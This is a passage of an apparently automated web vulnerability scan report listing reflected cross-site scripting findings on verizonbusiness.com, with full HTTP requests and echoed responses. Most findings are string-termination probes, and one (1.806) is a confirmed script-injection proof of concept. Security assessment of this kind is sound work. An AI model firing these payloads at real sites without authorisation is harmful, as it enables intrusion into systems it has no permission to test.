<script type="text/javascript">
var request='/resourcescfb4d';45f688c8adb/media/large-131513-mitsui.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.804. http://www.verizonbusiness.com/resources/media/large-131513-mitsui.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131513-mitsui.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35a89"%3b94600298a34 was submitted in the REST URL parameter 2. This input was echoed as 35a89";94600298a34 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/media35a89"%3b94600298a34/large-131513-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:42 GMT
Content-Type: text/html
Content-Length: 40268
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:42 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/media35a89";94600298a34/large-131513-mitsui.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.805. http://www.verizonbusiness.com/resources/media/large-131513-mitsui.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131513-mitsui.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa4ad'%3b62b12de13d0 was submitted in the REST URL parameter 2. This input was echoed as fa4ad';62b12de13d0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/mediafa4ad'%3b62b12de13d0/large-131513-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:57 GMT
Content-Type: text/html
Content-Length: 40268
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/mediafa4ad';62b12de13d0/large-131513-mitsui.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.806. http://www.verizonbusiness.com/resources/media/large-131513-mitsui.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131513-mitsui.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2949d</script><script>alert(1)</script>f38e035ba49 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/media/large-131513-mitsui.xml2949d</script><script>alert(1)</script>f38e035ba49 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "0491103df296fd929a20df935823abc4"
Last-Modified: Wed, 17 Nov 2010 00:05:20 GMT
Vary: User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 17215
Date: Wed, 17 Nov 2010 00:05:20 GMT
Connection: close
Set-Cookie: BERT=VRID%3d02413e2b-0f0c-4d06-8d2a-b2231ed696ba|VTID%3dc4ab117b-c51b-4d93-984e-65d7ed319752|SX%3d1289953520|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:09:04 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:05:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<url>/resources/media/large-131513-mitsui.xml2949d</script><script>alert(1)</script>f38e035ba49</url>
...[SNIP]...

1.807. http://www.verizonbusiness.com/resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11aee'%3b288c8280f16 was submitted in the REST URL parameter 1. This input was echoed as 11aee';288c8280f16 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources11aee'%3b288c8280f16/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:17:29 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40708
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources11aee';288c8280f16/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.808. http://www.verizonbusiness.com/resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4ecd"%3b918dfb6a6af was submitted in the REST URL parameter 1. This input was echoed as c4ecd";918dfb6a6af in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesc4ecd"%3b918dfb6a6af/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:17:19 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40708
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:20 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:19 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesc4ecd";918dfb6a6af/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FO
...[SNIP]...

1.809. http://www.verizonbusiness.com/resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 334ef"%3b1a323b258fe was submitted in the REST URL parameter 2. This input was echoed as 334ef";1a323b258fe in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/newsletters334ef"%3b1a323b258fe/most-clouds-obstruct-your-vision_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:17:40 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40318
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/newsletters334ef";1a323b258fe/most-clouds-obstruct-your-vision_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATIO
...[SNIP]...

1.810. http://www.verizonbusiness.com/resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aed21'%3b3cbba4a05b3 was submitted in the REST URL parameter 2. This input was echoed as aed21';3cbba4a05b3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/newslettersaed21'%3b3cbba4a05b3/most-clouds-obstruct-your-vision_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:17:47 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40318
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/newslettersaed21';3cbba4a05b3/most-clouds-obstruct-your-vision_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.811. http://www.verizonbusiness.com/resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b072"%3b710483d65d5 was submitted in the REST URL parameter 3. This input was echoed as 6b072";710483d65d5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf6b072"%3b710483d65d5 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:17:56 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40320
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:56 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf6b072";710483d65d5";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.812. http://www.verizonbusiness.com/resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb3de'%3bb1d26038fdb was submitted in the REST URL parameter 3. This input was echoed as bb3de';b1d26038fdb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdfbb3de'%3bb1d26038fdb HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:01 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40318
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdfbb3de';b1d26038fdb'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.813. http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/reports/rp_2010-data-breach-report_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1abe"%3b61de3a89f24 was submitted in the REST URL parameter 1. This input was echoed as c1abe";61de3a89f24 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesc1abe"%3b61de3a89f24/reports/rp_2010-data-breach-report_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40688
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesc1abe";61de3a89f24/reports/rp_2010-data-breach-report_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDAT
...[SNIP]...

1.814. http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/reports/rp_2010-data-breach-report_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4669'%3bfc7dae2fdb5 was submitted in the REST URL parameter 1. This input was echoed as c4669';fc7dae2fdb5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesc4669'%3bfc7dae2fdb5/reports/rp_2010-data-breach-report_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:25 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40688
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resourcesc4669';fc7dae2fdb5/reports/rp_2010-data-breach-report_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.815. http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/reports/rp_2010-data-breach-report_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa805'%3b819e712108d was submitted in the REST URL parameter 2. This input was echoed as aa805';819e712108d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/reportsaa805'%3b819e712108d/rp_2010-data-breach-report_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40298
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/reportsaa805';819e712108d/rp_2010-data-breach-report_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.816. http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/reports/rp_2010-data-breach-report_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f655c"%3b6abbaccf2fd was submitted in the REST URL parameter 2. This input was echoed as f655c";6abbaccf2fd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

